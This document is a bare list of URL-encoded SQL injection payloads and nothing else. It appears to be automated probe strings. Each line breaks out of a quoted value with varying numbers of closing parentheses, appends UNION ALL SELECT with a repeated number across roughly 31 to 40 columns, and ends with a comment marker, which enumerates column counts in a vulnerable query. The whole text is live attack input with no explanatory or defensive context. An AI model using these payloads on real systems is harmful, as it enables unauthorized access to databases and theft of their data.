-1620%27%29%20UNION%20ALL%20SELECT%207003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%2C7003%23 -8235%27%29%20UNION%20ALL%20SELECT%205043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%2C5043%23 -1939%27%29%29%20UNION%20ALL%20SELECT%205456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%23 -4954%27%29%29%20UNION%20ALL%20SELECT%209541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%2C9541%23 -7902%27%29%29%20UNION%20ALL%20SELECT%205736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%2C5736%23 -4276%27%29%29%20UNION%20ALL%20SELECT%201464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%2C1464%23 -5115%27%29%29%20UNION%20ALL%20SELECT%205560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%2C5560%23 -2852%27%29%29%20UNION%20ALL%20SELECT%208588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%2C8588%23 -6341%27%29%29%20UNION%20ALL%20SELECT%202216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%23 -3673%27%29%29%20UNION%20ALL%20SELECT%204744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%2C4744%23 -5812%27%29%29%20UNION%20ALL%20SELECT%208359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%2C8359%23 -2379%27%29%29%20UNION%20ALL%20SELECT%209608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%2C9608%23 -9344%27%29%29%29%20UNION%20ALL%20SELECT%204577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%23 -7653%27%29%29%29%20UNION%20ALL%20SELECT%209025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%2C9025%23 -6486%27%29%29%29%20UNION%20ALL%20SELECT%207180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%2C7180%23 -9889%27%29%29%29%20UNION%20ALL%20SELECT%205536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%2C5536%23 -5843%27%29%29%29%20UNION%20ALL%20SELECT%204055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%2C4055%23 -3850%27%29%29%29%20UNION%20ALL%20SELECT%207083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%2C7083%23 -6090%27%29%29%29%20UNION%20ALL%20SELECT%202663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%2C2663%23 -8496%27%29%29%29%20UNION%20ALL%20SELECT%203948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%23 -9102%27%29%29%29%20UNION%20ALL%20SELECT%204816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%2C4816%23 -3194%27%29%29%29%20UNION%20ALL%20SELECT%204465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%2C4465%23 -9112%27%20UNION%20ALL%20SELECT%204520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%2C4520%23 -1656%27%20UNION%20ALL%20SELECT%209668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%2C9668%23 -4685%27%20UNION%20ALL%20SELECT%206622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%2C6622%23 -3450%27%20UNION%20ALL%20SELECT%201077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%23 -4412%27%20UNION%20ALL%20SELECT%205058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%2C5058%23 -5195%27%20UNION%20ALL%20SELECT%201836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%2C1836%23 -8722%27%20UNION%20ALL%20SELECT%209719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%2C9719%23 -2812%27%20UNION%20ALL%20SELECT%207389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%2C7389%23 -5273%27%20UNION%20ALL%20SELECT%209808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%2C9808%23 -5697%27%20UNION%20ALL%20SELECT%203718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%2C3718%23 -8487%27%29%20UNION%20ALL%20SELECT%202770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%2C2770%23 -6037%27%29%20UNION%20ALL%20SELECT%202937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%2C2937%23 -3157%27%29%20UNION%20ALL%20SELECT%208887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%2C8887%23 -8408%27%29%20UNION%20ALL%20SELECT%202063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%2C2063%23 -5568%27%29%20UNION%20ALL%20SELECT%206247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%23 -3828%27%29%20UNION%20ALL%20SELECT%202939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%2C2939%23 -3589%27%29%20UNION%20ALL%20SELECT%203360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%23 -6174%27%29%20UNION%20ALL%20SELECT%201217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%2C1217%23 -2809%27%29%20UNION%20ALL%20SELECT%208540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%2C8540%23 -4842%27%29%20UNION%20ALL%20SELECT%202444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%23 -7961%27%29%29%20UNION%20ALL%20SELECT%207092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%2C7092%23 -9805%27%29%29%20UNION%20ALL%20SELECT%201569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%2C1569%23 -9690%27%29%29%20UNION%20ALL%20SELECT%207476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%2C7476%23 -6434%27%29%29%20UNION%20ALL%20SELECT%204577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%2C4577%23 -2403%27%29%29%20UNION%20ALL%20SELECT%209224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%2C9224%23 -8653%27%29%29%20UNION%20ALL%20SELECT%202112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%2C2112%23 -5202%27%29%29%20UNION%20ALL%20SELECT%203269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%2C3269%23 -9370%27%29%29%20UNION%20ALL%20SELECT%203441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%2C3441%23 -8337%27%29%29%20UNION%20ALL%20SELECT%202085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%23 -3736%27%29%29%20UNION%20ALL%20SELECT%209009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%2C9009%23 -3339%27%29%29%29%20UNION%20ALL%20SELECT%207737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%2C7737%23 -7644%27%29%29%29%20UNION%20ALL%20SELECT%209174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%2C9174%23 -5438%27%29%29%29%20UNION%20ALL%20SELECT%201024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%2C1024%23 -8348%27%29%29%29%20UNION%20ALL%20SELECT%205311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%2C5311%23 -8705%27%29%29%29%20UNION%20ALL%20SELECT%201891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%2C1891%23 -1839%27%29%29%29%20UNION%20ALL%20SELECT%209526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%2C9526%23 -2079%27%29%29%29%20UNION%20ALL%20SELECT%209731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%23 -4599%27%29%29%29%20UNION%20ALL%20SELECT%206436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%2C6436%23 -5413%27%29%29%29%20UNION%20ALL%20SELECT%204656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%2C4656%23 -3925%27%29%29%29%20UNION%20ALL%20SELECT%204120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%2C4120%23 -2033%27%20UNION%20ALL%20SELECT%201348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%2C1348%23 -6106%27%20UNION%20ALL%20SELECT%205206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%2C5206%23 -6768%27%20UNION%20ALL%20SELECT%204506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%2C4506%23 -1068%27%20UNION%20ALL%20SELECT%202962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%23 -7672%27%20UNION%20ALL%20SELECT%202202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%23 -8043%27%20UNION%20ALL%20SELECT%209276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%2C9276%23 -7494%27%20UNION%20ALL%20SELECT%207536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%2C7536%23 -4642%27%20UNION%20ALL%20SELECT%207165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%2C7165%23 -2030%27%20UNION%20ALL%20SELECT%206907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%2C6907%23 -5133%27%20UNION%20ALL%20SELECT%208170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%23 -4030%22%29%20UNION%20ALL%20SELECT%202886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%23 -9004%22%29%20UNION%20ALL%20SELECT%205693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%2C5693%23 